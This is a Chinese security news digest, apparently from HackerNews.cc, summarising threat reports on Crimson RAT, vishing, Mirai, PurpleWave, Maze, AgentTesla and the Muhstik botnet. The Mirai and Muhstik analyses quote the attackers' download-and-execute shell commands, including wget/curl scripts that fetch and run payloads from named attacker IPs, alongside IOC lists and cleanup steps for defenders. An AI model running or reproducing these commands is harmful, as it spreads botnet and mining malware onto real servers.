背景和主要发现 透明部落（又称PROJECTM和MYTHIC LEOPARD）是一个活动频繁的组织，其活动可以追溯到2013年。Proofpoint 在2016年发表了一篇有关他们的很好的文章，从那时起，我们一直关注着。我们已经通过APT威胁情报报告了他们的活动，在过去的四年中，这个APT小组从未休假。他们的目标通常是印度军方和政府人员。 多年来，该小组TTP一直保持一致，不断使用某些工具并为特定的活动创建新的程序。他们最喜欢的感染媒介是带有嵌入式宏的恶意文档，这些文档似乎是由自定义生成器生成的。 他们的主要恶意软件是自定义的.NET RAT，俗称Crimson RAT，但多年来，我们还观察到了其他自定义.NET恶意软件和基于Python的RAT Peppy的使用。 在过去的一年中，我们看到该组织加强了其活动，开始了大规模的感染运动，开发了新的工具并加强了对阿富汗的关注。 我们最近的调查将在两个博客文章中进行介绍。第一部分将涵盖以下关键点： 我们发现了Crimson Server组件，这是Transparent Tribe用来管理受感染机器和进行间谍活动的C2。该工具证实了我们对Crimson RAT的大多数观察结果，并帮助我们了解了攻击者的观点。 透明部落继续传播深红RAT，感染了多个国家（主要是印度和阿富汗）的受害者。 USBWorm组件是真实的，并且已在数百个系统上检测到它。这种恶意软件的存在早在几年前就已被推测出来，但是据我们所知，它从未被公开描述过。     … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1305/ 消息与封面来源：SUCURELIST，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。    

美国联邦调查局(FBI)和网络安全与基础设施安全局(CISA)周四发布联合预警，警告针对公司的语音钓鱼或 “vishing “攻击的威胁越来越大。在发布深入研究一个提供服务的犯罪集团后不到24小时，KrebsOnSecurity就发表了一篇文章，该集团提供的服务是人们可以在COVID-19大流行期间雇用他们从远程工作的员工那里窃取VPN凭证和其他敏感数据。 “COVID-19大流行导致大规模转向在家工作，导致企业虚拟专用网络（VPN）的使用增加，在2020年7月中旬，网络犯罪分子开始了一场名为vishing的活动–以无差别获得多家公司员工工具的访问权–最终目标是将访问权货币化。” 正如周三的报道所指出的那样，这些机构表示，攻击者设置的钓鱼网站往往连字符、目标公司的名称和某些词语都非常具有指向性–如 “支持”、”票据 “和 “员工”。作案者专注于对目标公司的新员工进行社会工程，并冒充目标公司IT服务台的工作人员。 FBI/CISA的联合警报称，vishing团伙还利用社交媒体平台上的公共档案、招聘人员和营销工具、公开的背景调查服务以及开源研究，大规模搜刮特定公司的员工档案。从警报中可以看出。 “作案者先是使用未经归属的网络电话（VoIP）号码 拨打目标员工的个人手机，随后开始结合其他办公室和受害者公司员工的虚假号码。行为人使用社会工程技术，在某些情况下，冒充受害者公司IT服务台的成员，利用他们对员工个人身份信息的了解–包括姓名、职位、在公司的时间和家庭住址–来获得目标员工的信任。” “然后，行为人说服目标员工将发送一个新的VPN链接，并要求他们登录，包括任何2FA[双因素认证]或OTP[一次性密码]的安全凭据也一并通过这种方法获取，随后他们记录员工提供的信息，并实时使用该员工的账户访问企业工具。” 警报指出，在某些情况下，毫无戒备的员工批准了2FA或OTP提示，或者是意外地批准了。除此之外，攻击者能够通过针对员工的SIM卡交换来拦截一次性代码，这涉及到移动电话公司的社会工程人员，让他们控制目标的电话号码。 这些机构表示，骗子利用被盗用的VPN凭证在受害者公司数据库中挖掘客户的个人信息，以便在其他攻击中加以利用。 “然后，行为人利用员工的访问权限对受害者进行进一步的研究，和/或使用取决于被访问的平台的不同方法来欺诈性地获得资金，”警报中写道。”货币化方法根据公司的不同而不同，但具有高度的侵略性，在最初的违规行为和破坏性的兑现计划之间有一个紧凑的时间表。” 该警告包括一些公司可以实施的建议，以帮助减轻这些vishing攻击的威胁，包括。 – 限制VPN连接仅用于受管理设备，使用硬件检查或安装证书等机制，因此仅靠用户输入不足以访问企业VPN。 – 在适用的情况下，限制VPN的访问时间，以减轻允许时间以外的访问。 – 采用域名监控，跟踪企业、品牌域名的创建或变更。 – 积极扫描和监控网络应用，以防止未经授权的访问、修改和异常活动。 – 采用最低权限原则，实施软件限制政策或其他控制措施；监控授权用户的访问和使用。 – 考虑对通过公共电话网络进行的员工与员工之间的通信采用正式的认证程序，并在其中使用第二种因素，以在讨论敏感信息之前，对电话进行认证。 – 改进2FA和OTP信息传递，以减少员工认证尝试的混乱。 – 确认网络链接没有拼写错误或包含错误的域名。 – 将正确的企业VPN URL加入书签，不要仅凭呼入的电话访问其他URL。 – 对自称来自合法组织的不明身份者的主动电话、访问或电子邮件信息要保持警惕。不要提供个人信息或有关您的组织的信息，包括其组织结构、组织结构和组织结构。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw     腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH（22端口）进行弱口令爆破攻击，成功登陆后执行shellcode下载shell脚本，然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 一、概述 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH（22端口）进行弱口令爆破攻击，成功登陆后执行shellcode下载shell脚本，然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 Mirai是一个大型僵尸网络，主要通过SSH和telnet弱口令进行感染，攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器，控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据，Mirai僵尸网络已在全国造成上万台设备感染，其中感染最多的为广东、上海和北京。 腾讯安全专家建议企业linux管理员避免使用弱口令，关闭非必须启用的端口，以防御黑客利用弱口令爆破的方式远程入侵，腾讯安全系列产品也针对Mirai僵尸网络的技术特点进行响应，清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Mirai僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Mirai僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）Mirai僵尸网络关联的IOCs已支持识别检测； 2）告警弱口令爆破行为。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀Mirai僵尸网络相关木马程序； 2）告警弱口令爆破行为。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测Mirai僵尸网络木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 攻击者通过SSH（22端口）弱口令爆破进行远程攻击，攻击成功后执行如下shellcode： cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行，reportandyougaybins.sh脚本内容如下： reportandyougaybins.sh主要功能为下载和执行二进制木马程序，会分别从以下地址下载基于多个架构体系的样本，其中i586、i686、x86可感染基于Intel处理器的Linux服务器： http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerpc http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l 以i586为例进行分析，该样本的主要功能为与C&C地址通信，接收远程命令对目标发起DDOS攻击。在IOT设备中，通常会有看门狗（watchdog）进程，不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能，如果未成功关闭，则进入循环不断向其发送保活指令0x80045705。 将木马进程名替换为”/usr/sbin/dropbear”或者”sshd”隐藏自身。 从/proc/net/route中获取本机IP。 初始化table，并将后续要使用的数据添加到table中。 然后table_retrieve_val从table中取出数据，table_lock_val和table_unlock_val分别为加密和解密数据，解密函数在toggle_obf()中实现，解密方法是将数据与table_key进行循环异或，其中table_key=0xDEDEFFBA。 解密并连接C&C服务器194.180.224.103:3982，然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982，然后向其发送字符串“arch xxx”，xxx为设备平台类型。 Mirai与C&C服务器通信TCP流： 获取C&C服务器返回的数据后，进入processCmd处理接收到的命令。 Mirai可根据命令向目标发起以下类型的DDoS攻击：”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。 HTTP攻击： UDP攻击： TCP攻击： SYN攻击： ACK攻击： IOCs IP 193.228.91.123 194.180.224.103 45.95.168.138 45.95.168.190 37.49.224.87 193.228.91.124 185.172.110.185 C&C 194.180.224.103:3982 MD5 649a06f5159fc4e8ee269a9e0e1fd095 8bb40eb446abb7472cb3a892fd2450b4 3f3f8184219514d5834df94f362c74bc ef3b89e44a3a4973575a876ee5105cec 34033f561d196495e5c4780327acca0a 6f637a4ccfd00d9c2e08ecb84ce0b987 03ff0f5521631db7fa0d7990b5b4c19e 91c0f5304438a42ae5f28c8c0ff15954 536accde3643cb8294dd671ae5bdb3a2 9789917095d92cfe507e5fc2266667a1 8bafcd3d57dc597af4b6cb497cf0a0de 7e8e28631962dd5d52cbd93e50e7916e 7bfd106fe9d41c658f3be934346d3ff6 f0d5b7e31b4308c5ec326de9304bd3f4 bd1db394d52b950eed972eae93b80469 8b49a58a0bcb93afe72f1e3c1d800515 97a3699b819496892788b5c7a24be868 990fe40e991b9813a4f73b115ba160cb 2c0cc3d82871cfc05d38ea0a04f7f80a 26c56b011a494886e758d12fc07f6951 6e6d56669554c492ec4b1a9abd23e35b 64e5195e9cde652de6b2623d2d3e098d 1eeee50672a42dc2e55c6d4126afaf26 f6bbcf50aeda03aab1b5bc21b3df3e99 8e7d3e4bedf9bc3ed8a67890edc36590 556bd1d4d93abf19b4075d12ffef02a8 0d5302aa5491b3944566a212ca205923 ef72d6cc859438142a166f1d3ea4d462 193f92152f483aeb7ebe6d42855d9f27 1de00b44ef800a9d878de591fc43b854 b6e5bfb4b2f75d828022b84a247e99f2 039f379f3a36b4ab982a5ada7ceea078 51547b23165bc6f205ec3625840f3800 92137cf8ff782e15995919ebaa658474 94e027f4d33900f116bcf176aba726de aefe0411bd89a9b97c1741b75c9f7d71 d15256b7a475f8934daf79364b0885a1 c624ed18ad756aa6f41a70fe90102d78 5ff2fc4de3a059b504e09b7b1663ac1f fe6d19da030b1d299c35e89639d567bd 24a2659c72a980997161950926063b84 51b2190aa408ae08c6c9bf8dc8acc6e0 ecd696438914cc3c60dbf6de0df48f87 b45af2197eb3d12a199a40a048a36db6 32ef86b0358793f7ceffe1822bbf70e1 60fd7ed2e1ad0d41875d761b899766c4 0970f7f309bc678b0117d600e3f80f5f a1dc1c62dba56af6a8b25767074d691d 1cca73d23c7e50f4111815e840bd8960 42c87649e776dd73aa06033f9b8b750e 08dc3f3c77161e1cc349d91263f76b8c 61915eb8d8742fea42d3683c7255945a 000466d4c6c06398042851a7c049f6b6 0be41e0b52c51ab4ad966513455550b1 6290db15f07f6ebb114824b912a10129 fe19b99077ef4fe492107e4a9b943094 9068c1c69ab5c6ba80f01bab1a1a2ad4 8bb40eb446abb7472cb3a892fd2450b4 2b8796693b5f578c40611e5221fb4788 9f71d8839d89f7bed716bb3f509eb22f 47f12cf0806d2875c592a7d15e266ee6 8ee73860cfe02ca529671c060c18cf00 9e91347c4d8afad598d21e446f967fb2 71d2dc0728e710e4f939c97e88929930 672380fd4c58302e1c48a45e75c580d7 143f7de27921db16b08cea70bb3bef7b 63db9805775b20dae4c0f06e03585446 4a751ef5ef5e48cfef33bd29e2a4a5b7 00bf4ee5a64971260683e047719c0dd8 028b7629ff410f429ba65db1f6779226 URL http[:]//193.228.91.123/ares.sh http[:]//193.228.91.123/arm7 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/33bi/Ares.ppc http[:]//193.228.91.123/33bi/Ares.arm6 http[:]//193.228.91.123/33bi/ares.armebv7 http[:]//193.228.91.123/33bi/ares.mips http[:]//193.228.91.123/33bi/Ares.m68k http[:]//193.228.91.123/33bi/ares.mpsl http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh http[:]//193.228.91.123/reportandyougaybins.sh http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerp http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l http[:]//194.180.224.103/mips http[:]//194.180.224.103/mipsel http[:]//194.180.224.103/sh4 http[:]//194.180.224.103/x86 http[:]//194.180.224.103/armv6l http[:]//194.180.224.103/i686 http[:]//194.180.224.103/powerpc http[:]//194.180.224.103/i586 http[:]//194.180.224.103/m68k http[:]//194.180.224.103/sparc http[:]//194.180.224.103/armv4l http[:]//194.180.224.103/armv5l 参考链接： https://www.freebuf.com/articles/terminal/117927.html http://blog.nsfocus.net/mirai-source-analysis-report/

Infostealer是网络犯罪分子最赚钱的工具之一，因为从感染了该恶意软件的系统收集的信息可以在地下网络犯罪分子中出售或用于凭据填充攻击。Zscaler ThreatLabZ团队遇到了一个名为PurpleWave的新Infostealer，它是用C ++编写的，并自动将其静默安装到用户的系统上。它连接到命令和控制（C＆C）服务器以发送系统信息，并将新的恶意软件安装到受感染的系统上。 该恶意软件的作者在俄罗斯网络犯罪论坛上销售PurpleWave，终身更新的费用为5,000 RUB（US 54）。 图1：俄罗斯论坛上的PurpleWave销售帖子出售PurpleWave的作者声称，这种窃取程序能够窃取Chromium和Mozilla浏览器的密码，cookie，卡以及自动填充形式。该窃取程序还会从指定路径中收集文件，进行屏幕截图并安装其他模块。     … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1298/ 消息与封面来源：zscaler，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

摘要 Maze勒索软件是目前在野外使用最广泛的勒索软件之一，由具有能力的参与者进行分发。 我们发现了一个Maze分支机构，在交付勒索软件之前部署了量身定制的持久性方法。 行动者似乎使用了被盗的证书在其信标上签名。 与其他攻击一样，行动者使用HTA有效载荷作为交互式外壳，能够捕获到实时的和去模糊化的内容。 背景 Maze勒索软件在过去的大约一年时间里被广泛使用，成为全世界许多不同参与者的最终有效载荷。今年，臭名昭著的Maze运营商不仅开始通过加密文件勒索公司，而且威胁会在线发布被窃取的文件，从而勒索公司。最近，我们抓住了一个Maze会员，该会员尝试通过借由我们客户的网络进行传播。 在这篇文章中，我们分享有关该Maze会员使用方法的详细信息，以阐明他们的策略并帮助安全团队在其自己的网络中寻找类似的IOC。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1294/ 消息与封面来源：SentinelLABS，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Tesla RAT（远程访问特洛伊木马）已成为2020年上半年威胁企业的最流行的恶意软件系列之一，被发现的攻击次数甚至超过TrickBot或Emotet，仅次于Dridex 。尽管Agent RAT代理已经存在了至少6年，但它仍在不断适应和发展，挫败了许多组织的安全工作。在COVID-19大流行期间，引入了具有附加功能的新变种，并且该恶意软件已广泛用于以冠状病毒为主题的网络钓鱼活动中。 AgentTesla | 背景与概述 AgentTesla的核心是键盘记录程序和信息窃取者。AgentTesla于2014年底首次发现，在过去的1-2年中，其使用量一直稳定增长。该恶意软件最初在各种地下论坛和市场上出售，还有它自己的AgentTesla.com网站（现已停产），与许多同时代代理商一样，AgentTesla也提供了该恶意软件本身以及数据收集管理面板，从被攻击设备获取的信息可以通过面板界面快速获得给攻击者。 最初推出时，可以购买各种“包”。每个软件包的基本区别在于许可期限和构建/更新的访问权限。当时，价格颇具竞争力，1个月的许可证售价为12.00美元，一直到6个月的许可证售价为35.00美元。还值得注意的是，与许多其他这种性质的工具一样，AgentTesla大力的破解版很快出现。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1293/  消息与封面来源：SentinelLABS，译者：叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ExBUifhDQTQEbU3sz7WNVA  腾讯安全威胁情报中心检测到大量源自境外IP及部分国内IP针对国内云服务器租户的攻击。攻击者通过SSH（22端口）爆破登陆服务器，然后执行恶意命令下载Muhstik僵尸网络木马，组建僵尸网络并控制失陷服务器执行SSH横向移动、下载门罗币挖矿木马和接受远程指令发起DDoS攻击。 一、概述 腾讯安全威胁情报中心检测到大量源自境外IP及部分国内IP针对国内云服务器租户的攻击。攻击者通过SSH（22端口）爆破登陆服务器，然后执行恶意命令下载Muhstik僵尸网络木马，组建僵尸网络并控制失陷服务器执行SSH横向移动、下载门罗币挖矿木马和接受远程指令发起DDoS攻击。 腾讯安全威胁情报中心经过用户授权，对此次攻击进行溯源分析，发现国内多家知名企业的云服务器均受到该僵尸网络攻击，目前已有上千台服务器沦陷受害。腾讯安全专家建议相关企业采取必要措施，拦截入侵者，恢复已失陷的系统。 腾讯安全系列产品已针对Muhstik僵尸网络采取应急响应措施，执行清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Muhstik僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Muhstik僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）Muhstik僵尸网络关联的IOCs已支持识别检测； 2）告警弱口令爆破行为； 3）已支持以下漏洞检测：JBOSS反序列化漏洞、WebLogic远程代码执行漏洞。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀Muhstik僵尸网络相关木马程序； 2）告警弱口令爆破行为； 3）已支持以下漏洞检测：JBOSS反序列化漏洞、WebLogic远程代码执行漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Vulnerability Scan Service，VSS） 腾讯漏洞扫描服务已支持检测全网资产是否受Muhstik僵尸网络所使用的高危漏洞影响。 关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全、腾讯漏洞扫描服务等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测Muhstik僵尸网络木马与服务器的网络通信； 2）已支持以下漏洞利用的检测：WebLogic Fusion中间件远程代码执行漏洞、WebLogic远程代码执行漏洞CVE-2019-2725 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、样本分析 腾讯T-Sec云防火墙检测到多例弱口令爆破攻击，告警信息显示源IP为98.172.225.26正通过22端口爆破攻击云服务器。 由于腾讯T-Sec云防火墙及时预警攻击流量，安全专家迅速采取针对性处置措施，云服务器租户未遭受损失。腾讯云防火墙（Cloud Firewall，CFW）是一款基于公有云环境下的 SaaS 化防火墙，主要为用户提供互联网边界的防护。在入侵防御功能中，支持威胁情报、基础防御、虚拟补丁三种防御模式。 通过爆破攻击记录进行分析发现，攻击源IP来自美国、德国、俄罗斯、意大利等多个国家，其中美国较多。攻击者对单个主机进行爆破登陆次数平均为100次左右。部分攻击源IP列表如下： 爆破攻击时使用的部分账号名为：root、oracle、postgres、git、test 爆破登陆成功后利用wget命令下载shell脚本http[:]//167.99.39.134/.x/1sh、http[:]//167.99.39.134/.x/2sh、http[:]//167.99.39.134/.x/3sh并执行。 1sh脚本代码如下： wget http[:]//167.99.39.134/.x/pty1 -O ar/run/pty1; chmod +x ar/run/pty1; chmod 700 ar/run/pty1; ar/run/pty1 & wget http[:]//167.99.39.134/.x/pty2 -O ar/run/pty2; chmod +x ar/run/pty2; chmod 700 ar/run/pty2; ar/run/pty2 & wget http[:]//167.99.39.134/.x/pty5 -O ar/run/pty5; chmod +x ar/run/pty5; chmod 700 ar/run/pty5; ar/run/pty5 & wget http[:]//167.99.39.134/.x/pty11 -O ar/run/pty11; chmod +x ar/run/pty11; chmod 700 ar/run/pty11; ar/run/pty11 & wget http[:]//167.99.39.134/.x/pty3 -O pty3; chmod +x pty3 ; chmod 700 pty3 ; ./pty3 & wget http[:]//167.99.39.134/.x/pty10 -O pty10; chmod +x pty10 ; chmod 700 pty10 ; ./pty10 & wget http[:]//167.99.39.134/.x/pty4 -O pty4; chmod +x pty4 ; chmod 700 pty4 ; ./pty4 & wget http[:]//167.99.39.134/.x/pty3 -O ar/tmp/pty3; chmod +x ar/tmp/pty3 ; chmod 700 ar/tmp/pty3 ; ar/tmp/pty3 & wget http[:]//167.99.39.134/.x/pty3 -O ar/run/pty3; chmod +x ar/run/pty3; chmod 700 ar/run/pty3; ar/run/pty3 & rm -rf ar/run/1sh 1sh有以下功能： 1、 wget下载pty1、pty2、pty5、pty11释放到/var/run/目录下，赋予可执行权限并启动； 2、 wget下载pty3、pty10、pty4到当前目录下，赋予可执行权限并启动； 3、 wget下载pty3到/var/tmp/和/var/run/目录下，赋予可执行权限并启动； 4、 删除脚本自身。 2sh脚本代码如下： wget http[:]//167.99.39.134/.x/pty1 -O /tmp/pty1 ; chmod +x /tmp/pty1 ; chmod 700 /tmp/pty1 ; /tmp/pty1 ; cp /binsybox /tmp/loop0 ; cat /tmp/pty1 > /tmp/loop0 ; /tmp/loop0 & wget http[:]//167.99.39.134/.x/pty2 -O /tmp/pty2 ; chmod +x /tmp/pty2 ; chmod 700 /tmp/pty2 ; /tmp/pty2 ; cp /binsybox /tmp/loop1 ; cat /tmp/pty2 > /tmp/loop1 ; /tmp/loop1 & wget http[:]//167.99.39.134/.x/pty11 -O /tmp/pty11 ; chmod +x /tmp/pty11 ; chmod 700 /tmp/pty11 ; /tmp/pty11 ; cp /binsybox /tmp/loop1 ; cat /tmp/pty11 > /tmp/loop1 ; /tmp/loop1 & wget http[:]//167.99.39.134/.x/pty10 -O /tmp/pty10 ; chmod +x /tmp/pty10 ; chmod 700 /tmp/pty10 ; /tmp/pty10 ; cp /binsybox /tmp/loop2 ; cat /tmp/pty10 > /tmp/loop2 ; /tmp/loop2 & wget http[:]//167.99.39.134/.x/pty4 -O /tmp/pty4 ; chmod +x /tmp/pty4 ; chmod 700 /tmp/pty4 ; /tmp/pty4 ; cp /binsybox /tmp/loop3 ; cat /tmp/pty4 > /tmp/loop3 ; /tmp/loop3 & wget http[:]//167.99.39.134/.x/pty5 -O /tmp/pty5 ; chmod +x /tmp/pty5 ; chmod 700 /tmp/pty5 ; /tmp/pty5 ; cp /binsybox /tmp/loop3 ; cat /tmp/pty5 > /tmp/loop4 ; /tmp/loop4 & rm -rf /tmp/2sh 2sh有以下功能： 1、 wget下载pty1、pty2、pty11、pty10、pty4、pty5到/tmp/目录下，赋予可执行权限并启动； 2、 将下载的文件拷贝到/tmp/目录下，重命名为loop0、loop1（pty2和pty11）、loop2、loop3、loop4并启动； 3、 删除脚本自身。 3sh脚本代码如下： curl http[:]//167.99.39.134/.x/pty10 -o pty10 ; chmod +x pty10 ; chmod 700 pty10 ; ./pty10 curl http[:]//167.99.39.134/.x/pty3 -o pty3; chmod +x pty3 ; chmod 700 pty3 ; ./pty3 curl http[:]//167.99.39.134/.x/pty4 -o pty4; chmod +x pty4 ; chmod 700 pty4 ; ./pty4 curl http[:]//167.99.39.134/.x/pty10 -o /tmp/pty10 ; chmod +x /tmp/pty10 ; chmod 700 /tmp/pty10 ; /tmp/pty10 & curl http[:]//167.99.39.134/.x/pty1 -o /tmp/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 & curl http[:]//167.99.39.134/.x/pty2 -o /tmp/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & curl http[:]//167.99.39.134/.x/pty5 -o /tmp/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 & curl http[:]//167.99.39.134/.x/pty11 -o /tmp/pty11; chmod +x /tmp/pty11; chmod 700 /tmp/pty11; /tmp/pty11 & 3sh有以下功能： 1、 curl下载pty10、pty3、pty4到当前目录，赋予可执行权限并启动； 2、 curl下载pty10、pty1、pty2、pty5、pty11到/tmp/目录，赋予可执行权限并启动。 分析发现，pty*属于Muhstik僵尸网络Muhstik组件。Muhstik在2018年3月左右被发现，具有蠕虫式的自我传播能力，使用多个漏洞利用来感染Linux服务，如Weblogic、WordPress和Drupal。该僵尸网络还会感染IoT路由器，如GPON家用路由器、DD-WRT路由器和Tomato路由器等。 pty*运行后会将自身拷贝到以下目录，并将其安装为crontab定时任务，/etc/inittab系统启动项进行持久化。 /dev/shm/pty4 /var/tmp/pty4 /var/lock/pty4 /var/run/pty4 Muhstik感染设备后，会发送一个connect命令到IRC服务器，通过Connect命令中含有设备的昵称（nickname）来加入到信道中。然后服务器响应一个含有BotnetID的PING命令，受感染的设备会回复一个含有BotnetID的PONG。 一旦nickname构造好，并分配给受感染的客户端后，IRC服务器就会接受主机作为信道中的客户端，并发送一个MOTD (Message of the Day)给客户端。最后，受害者设备发送一个命令到加入名为ei的信道，通过该信道接收僵尸网络的控制命令。 muhstik.c2.list会向已感染僵尸系统bot发起指令，控制僵尸系统执行新的扫描、在已入侵网络中横向扩散、下载运行xmrig进行门罗币挖矿或对指定目标发起DDoS攻击。 Muhstik僵尸网络会在感染机器下载门罗币挖矿木马http[:]//167.99.39.134/xmra64到/tmp/xmra64或/[user]/xmra64目录下并启动挖矿。 三、安全建议： 腾讯安全专家建议企业Linux系统管理员及时修复高危漏洞，避免使用弱口令，以防服务器被远程攻击。可参考以下步骤手动检查、清除Muhstik僵尸网络病毒。 1.查找以下文件，kill其进程并删除文件： （user为root、oracle、postgres、root、git、test其中之一） /var/run/pty1 /var/run/pty2 /var/run/pty3 /var/run/pty5 /var/run/pty11 /home/[user]/pty3 /home/[user]/pty10 /home/[user]/pty4 /tmp/pyt1 /tmp/pyt2 /tmp/pyt3 /tmp/pyt4 /tmp/pyt5 /tmp/pyt10 /tmp/pyt11 /tmp/loop0 /tmp/loop1 /tmp/loop2 /tmp/loop3 /tmp/loop4 /tmp/xmra64 /home/[user]/xmra64 /dev/shm/pty4 /var/tmp/pty4 /var/lock/pty4 /var/run/pty4 2.crontab -l查看定时任务中是否包含以上pty文件相关内容，如有将其删除。 3.cat /etc/inittab查看Linux系统启动任务中是否包含以上pty文件相关内容，如有将其删除。 IOCs IP 167.99.39.134 165.227.78.159 128.199.251.119 C2: irc.de-zahlung.eu irc.deutschland-zahlung.net md5 1sh 861c40811b98780ce8eba0c572dfaa9b 2sh bfc90665de5c74c45488226a8999630b 2sh ca6d74719f063b9c79cb4d81d7299392 pty1 67a74bc4803338314e6d26bc49718b80 pty2 c69da71d1082234abd89ee40f0058287 pty2 5ab7ab3742014ad0ac3c24040f64850a pty3 6e1e7dfc55924c0eef1e92435bc1d7b2 pty3 fd55671c226217e639278e874ecfdf06 pty4 53a62df6802cc71eea1bc7fdf4c479c4 pty4 cac757d94276b3cd6b45f1717646f876 pty4 777379b60b69b63b1b422e0c62a35f3c pty5 3f7661a3cb69263d3075469e103a427e pty5 09cab3119e981ee5a2a8cf074374f1df pty10 a40149fc7c41ad2a3a9692d162cadc38 pty10 